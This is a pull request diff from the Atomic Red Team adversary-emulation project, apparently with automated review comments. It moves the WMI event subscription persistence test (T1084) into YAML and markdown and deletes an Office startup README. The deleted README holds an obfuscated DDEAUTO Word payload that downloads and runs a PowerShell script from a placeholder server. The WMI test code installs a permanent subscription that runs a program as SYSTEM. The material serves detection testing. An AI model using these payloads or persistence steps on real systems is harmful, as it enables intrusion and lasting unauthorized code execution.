Merge pull request #220 from redcanaryco/T1084

T1084
Michael Haag
2018-05-25 11:07:09 -04:00
committed by GitHub
8 changed files with 151 additions and 85 deletions
@@ -1,28 +0,0 @@
# Office Application Startup
MITRE ATT&CK Technique: [T1137](https://attack.mitre.org/wiki/Technique/T1137)
## DDEAUTO
1. Open Word
2. Insert tab -> Quick Parts -> Field
3. Choose = (Formula) and click ok.
4. Once the field is inserted, you should now see "!Unexpected End of Formula"
5. Right-click the Field, choose "Toggle Field Codes"
6. Paste in the code from Unicorn or SensePost
7. Save the Word document.
* [SensePost DDEAUTO](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
* [TrustedSec - Unicorn](https://github.com/trustedsec/unicorn)
Generate the payload and download.ps1 following the Unicorn instructions, or to make one "just work", follow the steps below.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"
## Word VBA Macro
[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
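Review bot: the T1137 Office Application Startup README removed in this hunk has no replacement among the 8 changed files (no T1137.md or T1137.yaml is added), so the DDEAUTO field-code walkthrough, the SensePost and Unicorn references and the Word VBA Macro pointer to Dragon's Tail disappear from the repository rather than being converted, and the deletion is outside the T1084 scope named in the commit title. Either keep this file out of the PR, or convert it to the new `attack_technique`/`atomic_tests` YAML plus generated markdown layout in the same change so the technique keeps coverage in the index and matrix.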
@@ -1,53 +0,0 @@
## Windows Management Instrumentation Event Subscription
MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084)
### Persistence
Example:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Cleanup:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
#### References
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
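Review bot: the two code blocks in this removed README are fenced as ```powershell, but the same blocks in the generated T1084.md are untagged ``` fences, so syntax highlighting and any tooling that keys on the fence language is lost in the move; the generator should emit the executor name as the fence language. The `#### References` section at the end is otherwise folded into the test descriptions, so nothing else is dropped here.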
+79
@@ -0,0 +1,79 @@
# T1084 - Windows Management Instrumentation Event Subscription
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084)
<blockquote>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
Detection: Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns)
Platforms: Windows
Data Sources: WMI Objects
Permissions Required: Administrator, SYSTEM</blockquote>
## Atomic Tests
- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
- [Atomic Test #2 - Persistence Cleanup](#atomic-test-2---persistence-cleanup)
<br/>
## Atomic Test #1 - Persistence
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
<br/>
<br/>
## Atomic Test #2 - Persistence Cleanup
Run from an administrator powershell window
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
<br/>
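Review bot: the line "you should see notepad.exe running as SYSTEM" in Atomic Test #1 will mislead testers, because a CommandLineEventConsumer is launched by the WMI provider host as SYSTEM in session 0, so notepad never appears on a user's desktop; reword it to say the process is visible only in a process listing (for example Task Manager's Details tab or `Get-Process notepad -IncludeUserName`). Two further documentation gaps in the same description: the filter only matches while `SystemUpTime` is between 240 and 325 seconds, polled every 60 seconds, which is why a reboot is required and why it fires once per boot, and the subscription is permanent and will keep firing on every subsequent boot until Test #2 is run; both facts are worth stating so a tester does not leave it behind. Since the ATT&CK detection text only mentions Autoruns, the description should also point at the telemetry that actually records this test: Sysmon Event IDs 19, 20 and 21 (WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter) and Event ID 5861 in the Microsoft-Windows-WMI-Activity/Operational log on Windows 10 and Server 2016 and later.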
+64
@@ -0,0 +1,64 @@
---
attack_technique: T1084
display_name: Windows Management Instrumentation Event Subscription
atomic_tests:
- name: Persistence
description: |
Run from an administrator powershell window
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
supported_platforms:
- windows
executor:
name: powershell
command: |
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
- name: Persistence Cleanup
description: |
Run from an administrator powershell window
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
supported_platforms:
- windows
executor:
name: powershell
command: |
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
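Review bot: the cleanup command in the `Persistence Cleanup` test has no check that the consumer was actually found; when Test #1 was not run on this host, or was already cleaned up, `$EventConsumerToCleanup` is `$null`, the interpolated `$($EventConsumerToCleanup.__RELPATH)` expands to nothing, and `Get-WmiObject` is handed the query `REFERENCES OF {} WHERE ResultClass = __FilterToConsumerBinding`, which throws an invalid-query error instead of reporting that there is nothing to remove. Wrap the binding lookup and the three `Remove-WmiObject` lines in `if ($EventConsumerToCleanup) { ... }` or test each variable before piping it. Separately, the create test uses the CIM cmdlets (`New-CimInstance`) while the cleanup uses the legacy WMI cmdlets (`Get-WmiObject`, `Remove-WmiObject`), which do not exist in PowerShell 6 and later, so on those hosts the persistence is created but the cleanup fails; `Get-CimInstance -Namespace root/subscription -ClassName __EventFilter -Filter "Name = '...'"` piped to `Remove-CimInstance`, and the same for the consumer and binding, keeps both tests on one cmdlet family.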
+3 -1
@@ -82,7 +82,9 @@
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# defense-evasion
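Review bot: the replaced T1084 entry now correctly links to `./T1084/T1084.md`, but the neighbouring entries in this hunk still link to `https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md`, a feature-branch URL that will 404 as soon as that branch is deleted; the index generator should emit a relative `./CONTRIBUTIONS.md` link (or a master-branch URL) for techniques without atomics, which would fix all of these lines in one regeneration.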
+1 -1
@@ -55,7 +55,7 @@
| | | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
| | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
+3 -1
@@ -182,7 +182,9 @@
- [T1209 Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- [T1004 Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# discovery
+1 -1
@@ -40,7 +40,7 @@
| | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | | | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |